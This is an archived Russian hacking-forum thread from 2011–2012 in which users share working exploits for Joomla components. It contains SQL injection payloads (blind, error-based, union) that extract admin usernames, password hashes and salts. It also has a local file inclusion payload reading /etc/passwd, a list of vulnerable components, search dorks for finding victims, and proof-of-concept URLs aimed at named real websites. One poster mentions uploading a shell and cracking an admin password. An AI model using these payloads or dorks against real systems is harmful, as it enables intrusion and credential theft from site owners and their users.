ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
31.12.2011, 22:02
|
|
Guest
Сообщений: n/a
Провел на форуме:
149611
Репутация:
81
|
|
[COLOR="YellowGreen"][SIZE="3"]Blind SQL Injection в Joomla
Example:
Сообщение от None
http://autoschooler.ru/component/blog_calendar/?year=2011&month=12&modid=23+and%20mid(version(),1 ,1)=5+--+
True
Сообщение от None
http://autoschooler.ru/component/blog_calendar/?year=2011&month=12&modid=23+and%20mid(version(),1 ,1)=4+--+
False
-----------------------------------------------------------
(c) By Osstudio & Er9j6@.
З.Ы С новым годом! |
|
|
|
01.01.2012, 11:31
|
|
Guest
Сообщений: n/a
Провел на форуме:
102354
Репутация:
267
|
|
Сообщение от Osstudio
Osstudio said:
(Он вроде встроенный..)
Нет, не встроенный. Уязвимый код(вроде) в view.html.php
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]...
if([/COLOR][COLOR="#0000BB"]$modid[/COLOR][COLOR="#007700"]){[/COLOR][COLOR="#FF8000"]//if the component is called from the a Blog Calendar module, load the parameters of that module
[/COLOR][COLOR="#0000BB"]$query[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]'SELECT params'
[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]' FROM #__modules'
[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]' WHERE id = '[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$modid[/COLOR][COLOR="#007700"];
...
[/COLOR][/COLOR]
Dork: inurl:component/blog_calendar/
P.S.
FALSE
Код:
Code:
http://meirbruk.net/en/component/blog_calendar/?year=2011&month=09&modid=250+union+select+1,2--+f
TRUE
Код:
Code:
http://meirbruk.net/en/component/blog_calendar/?year=2011&month=09&modid=250+union+select+1--+f
Увидев это попробовал error-based, как ни странно, пашет все:
Код:
Code:
http://meirbruk.net/en/component/blog_calendar/?year=2011&month=09&modid=250+and(select+1+from(select+count(*),concat((select+table_name+from+information_schema.tables+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)--
Результат:
Код:
Code:
Duplicate entry 'COLLATIONS1' for key
Вывод, если включен дебаг, то можно обойтись без blind. Сейчас залью шелл и посмотрю версию на сайте выше...
UPD. При error-based, как известно, выводится 64 символов. А в joomla hash:salt имеет длину в 65 символов Вот такая ирония, юзайте blind...
|
|
|
|
01.01.2012, 14:55
|
|
Guest
Сообщений: n/a
Провел на форуме:
149611
Репутация:
81
|
|
Сообщение от Ereee
Ereee said:
UPD. При error-based, как известно, выводится 64 символов. А в joomla hash:salt имеет длину в 65 символов
Вот такая ирония, юзайте blind...
Я через еrror-based вывел имена, вот тебе блиндом кручу админский пасс
|
|
|
|
01.01.2012, 16:35
|
|
Reservists Of Antichat - Level 6
Регистрация: 19.09.2008
Сообщений: 127
Провел на форуме:
835386
Репутация:
1463
|
|
Сообщение от Ereee
Ereee said:
и error-based, как известно, выводится 64 символов. А в joomla hash:salt имеет длину в 65 символов
Вот такая ирония, юзайте blind...
Можно вырезать подстроку, если поле > 64 символов, функциями substring(), mid().
Пример:
Достаем логин и хеш
Код:
Code:
Post _ttp://meirbruk.net/en/component/blog_calendar/?year=2011&month=09 Http/1.0
modid=(@:=1)or@+group+by+concat((select+concat(username,0x3a,mid(password,1,33))+from+jos_users+limit+0,1),0x00,@:=!@)having@||min(0)--+
достаем соль
Код:
Code:
modid=(@:=1)or@+group+by+concat((select+mid(password,33,33)+from+jos_users+limit+0,1),0x00,@:=!@)having@||min(0)--+
|
|
|
10.01.2012, 14:52
|
|
Guest
Сообщений: n/a
Провел на форуме:
102354
Репутация:
267
|
|
LFI
Во многих компонентах Joomla в параметре controller обнаружена LFI-уязвимость. Список уязвимых компонентов:
Код:
Code:
com_bca-rss-syndicator
com_ccnewsletter
com_ckforms
com_cvmaker
com_datafeeds
com_dioneformwizard
com_dwgraphs
com_fabrik
com_gadgetfactory
com_ganalytics
com_gcalendar
com_hsconfig
com_if_surfalert
com_janews
com_jfeedback
com_joomlapicasa2
com_joomlaupdater
com_joommail
com_jshopping
com_juliaportfolio
com_jvehicles
com_jwhmcs
com_linkr
com_mediqna
com_mmsblog
com_mscomment
com_mtfireeagle
com_ninjarsssyndicator
com_onlineexam
com_orgchart
com_pcchess
com_properties
com_rokdownloads
com_rpx
com_s5clanroster
com_sbsfile
com_sectionex
com_shoutbox
com_simpledownload
com_smestorage
com_spsnewsletter
com_svmap
com_sweetykeeper
com_userstatus
com_webeecomment
com_weberpcustomer
com_zimbcomment
Эксплуатация:
Код:
Code:
http://site/index.php?option=имя_компонента&controller=../../etc/passwd%00
Dork:inurl:index.php?option=имя_компонента
Источник
P.S. В нете по чуть-чуть выкладивали вроде.
|
|
|
|
13.01.2012, 20:26
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме:
371875
Репутация:
137
|
|
com_aquiz
Blind SQL Injection в Joomla
Уязвимость в компоненте для тестов " com_aquiz".
Exploit:
Код:
Code:
http://site.ru/index.php?option=com_aquiz&task=take&quizid=1885+and+/*!mid(version(),1,1)=5*/+--+
Уязвимый параметр: quizid
Example:
Сообщение от None
_http://ajama.ru/index.php?option=com_aquiz&task=take&quizid=1885+a nd+/*!mid(version(),1,1)=5*/+--+ True
Сообщение от None
_http://ajama.ru/index.php?option=com_aquiz&task=take&quizid=1885+a nd+/*!mid(version(),1,1)=4*/+--+ False
-----------------------------------------------------------
(c) By winstrool
|
|
|
|
14.01.2012, 15:22
|
|
Guest
Сообщений: n/a
Провел на форуме:
102354
Репутация:
267
|
|
Joomla "com_as" component SQL Injection
Уязвим параметр prodid, что позволяет провести SQL-injection.
Эксплyатация:
Код:
Code:
http://site.ltd/index.php?option=com_as&as=200&page=1&prodid=-5+union+select+1,2,3,4,version(),6,7,8,9,10,11,12,13,14,15,16,17,18,19--+f
Код:
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]$query[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"SELECT "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$select[/COLOR][COLOR="#007700"].
[/COLOR][COLOR="#DD0000"]"\n FROM "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$from[/COLOR][COLOR="#007700"].
[/COLOR][COLOR="#DD0000"]"\n WHERE id = "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$var[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]]->[/COLOR][COLOR="#0000BB"]prod_id[/COLOR][COLOR="#007700"];[/COLOR][/COLOR]
PoC:
Код:
Code:
http://www.hawa-verpackung.de/index.php?option=com_as&as=200&page=1&prodid=-5+union+select+1,2,3,4,version(),6,7,8,9,10,11,12,13,14,15,16,17,18,19--+f
© Ereee
|
|
|
|
15.01.2012, 17:20
|
|
Guest
Сообщений: n/a
Провел на форуме:
102354
Репутация:
267
|
|
Joomla "com_dir" component SQL Injection
Уязвим параметр id, что позволяет провести SQL-injection. Уязвимый код не смотрел, так как хэш не расшифровал. Скоро выложу.
Эксплyатация:
Код:
Code:
http://site.ltd/index.php?option=com_dir&task=show&id=-381+union+select+1,version(),3,database(),user(),concat(username,0x3a,password),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+jos_users+limit+0,1--+f
PoC:
Код:
Code:
http://quicaqui.com/index.php?option=com_dir&task=show&id=-381+union+select+1,version(),3,database(),user(),concat(username,0x3a,password),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+jos_users+limit+0,1--+f
© Ereee
|
|
|
|
15.01.2012, 20:59
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме:
371875
Репутация:
137
|
|
com_as_shop
MySQL Injection в Joomla
Уязвимость в модуле " com_as_shop".
Exploit:
Код:
Code:
http://site.ru/index.php?option=com_as_shop&cmd=gbc&id=-1+union+select+1,concat(username,0x3a,password,0x3a,usertype),3+from+jos_users+--+
Уязвимый параметр: id
Example:
Сообщение от None
_http://www.scandimix.ru/index.php?option=com_as_shop&cmd=gbc&id=-10+union+select+1,concat(username,0x3a,password,0x 3a,usertype),3+from+s15092010_users+--+
Уязвимые места в коде: components/com_as_shop/controllers/goods.php
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]function[/COLOR][COLOR="#0000BB"]getGNameById[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$id[/COLOR][COLOR="#007700"])
{
[/COLOR][COLOR="#FF8000"]/// Joomla ver28.10.2010
[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]db[/COLOR][COLOR="#007700"]=&[/COLOR][COLOR="#0000BB"]JFactory[/COLOR][COLOR="#007700"]::[/COLOR][COLOR="#0000BB"]getDBO[/COLOR][COLOR="#007700"]();;
[/COLOR][COLOR="#0000BB"]$sSQL[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"SELECT * FROM `#__as_goods` WHERE `id` ="[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$id[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$rs[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]db[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]setQuery[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$sSQL[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$rw[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]db[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]loadObjectList[/COLOR][COLOR="#007700"]();
[/COLOR][COLOR="#0000BB"]$rw[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$rw[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]];
return[/COLOR][COLOR="#0000BB"]$rw[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]name[/COLOR][COLOR="#007700"];
}
function[/COLOR][COLOR="#0000BB"]getGArticleById[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$id[/COLOR][COLOR="#007700"])
{
[/COLOR][COLOR="#FF8000"]/// Joomla ver28.10.2010
[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]db[/COLOR][COLOR="#007700"]=&[/COLOR][COLOR="#0000BB"]JFactory[/COLOR][COLOR="#007700"]::[/COLOR][COLOR="#0000BB"]getDBO[/COLOR][COLOR="#007700"]();;
[/COLOR][COLOR="#0000BB"]$sSQL[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"SELECT * FROM `#__as_goods` WHERE `id` ="[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$id[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$rs[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]db[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]setQuery[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$sSQL[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$rw[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]db[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]loadObjectList[/COLOR][COLOR="#007700"]();
[/COLOR][COLOR="#0000BB"]$rw[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$rw[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]];
return[/COLOR][COLOR="#0000BB"]$rw[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]article[/COLOR][COLOR="#007700"];
}
function[/COLOR][COLOR="#0000BB"]getGPriceById[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$id[/COLOR][COLOR="#007700"])
{
[/COLOR][COLOR="#FF8000"]/// Joomla ver28.10.2010
[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]db[/COLOR][COLOR="#007700"]=&[/COLOR][COLOR="#0000BB"]JFactory[/COLOR][COLOR="#007700"]::[/COLOR][COLOR="#0000BB"]getDBO[/COLOR][COLOR="#007700"]();;
[/COLOR][COLOR="#0000BB"]$sSQL[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"SELECT * FROM `#__as_goods` WHERE `id` ="[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$id[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$rs[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]db[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]setQuery[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$sSQL[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$rw[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]db[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]loadObjectList[/COLOR][COLOR="#007700"]();
[/COLOR][COLOR="#0000BB"]$rw[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$rw[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]];
return[/COLOR][COLOR="#0000BB"]$rw[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]price[/COLOR][COLOR="#007700"];
}[/COLOR][/COLOR]
как видем версия компанента датирована от 28.10.2010
-----------------------------------------------------------
(c) By winstrool
|
|
|
|
16.01.2012, 09:15
|
|
Guest
Сообщений: n/a
Провел на форуме:
102354
Репутация:
267
|
|
Joomla "com_msg" component SQL Injection
Уязвим параметр Itemid, что позволяет провести SQL-injection. Не путать этот модуль с модулем обратной связи.
Эксплyатация:
Код:
Code:
http://site.ltd/index.php?option=com_msg&view=inhalte&Itemid=-15+union+select+version()--+g
Открываем исходный код страницы, видим:
Код:
Code:
wechsel("5.1.49-3~bpo50+1-log");
PoC:
Код:
Code:
http://www.msg-wintergaerten.de/index.php?option=com_msg&view=inhalte&Itemid=-15+union+select+version()--+g
© Ereee
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
